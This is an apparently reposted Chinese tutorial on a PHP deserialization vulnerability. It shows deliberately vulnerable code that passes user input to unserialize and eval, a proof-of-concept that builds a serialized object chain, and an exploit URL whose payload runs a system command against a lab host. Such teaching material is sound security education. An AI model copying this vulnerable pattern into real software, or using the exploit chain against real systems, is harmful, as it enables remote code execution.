欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 健康 > 美食 > 反序列化漏洞

反序列化漏洞

2024/10/25 8:21:48 来源:https://blog.csdn.net/zhuge_long/article/details/141199135  浏览:    关键词:反序列化漏洞

存在反序列化漏洞的代码

class Woniu {var $a;function __construct() {$this->a = new Test();}function __destruct() {$this->a->hello();}
}class Test {function hello() {echo "Hello World.";}
}class Vul {var $data;function hello() {@eval($this->data);}
}unserialize($_GET['code']);

准备POC代码

分析上述代码,其中Test类为干扰类,完全不需要考虑他,只需要考虑Woniu类与Vul类
目标明确一下 就是Woniu类调用Vul类 Vul类调用hello函数 hello函数使用$data数据完成漏洞利用

class Woniu {var $a;function __construct() {$this->a = new Test();}
}
class Vul {var $data = "system('ifconfig');";
}
echo serialize(new Woniu());  
//输出为: O:5:"Woniu":1:{s:1:"a";O:3:"Vul":1:{s:4:"data";s:19:"system('ifconfig');";}}

漏洞利用

http://192.168.88.66/fanyun/woniu.php?code=O:5:"Woniu":1:{s:1:"a";O:3:"Vul":1:{s:4:"data";s:19:"system('ifconfig');";}}

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

相关资讯

热文排行

最新新闻

推荐新闻

热搜词

【蓝桥杯选拔赛真题78】python电话号码 第十五届青少年组蓝桥杯python选拔赛真题 算法思维真题解析 AI产品经理面试必问的15个大模型概念和4个 【Linux】环境下升级redis Vue前端开发:双向数据绑定之指令v-model 【vue2.7.16系列】手把手教你搭建后台系统__selectIcon和svgIcon组件(12) 碰一碰发视频,一张卡储存一万条短视频,支持OEM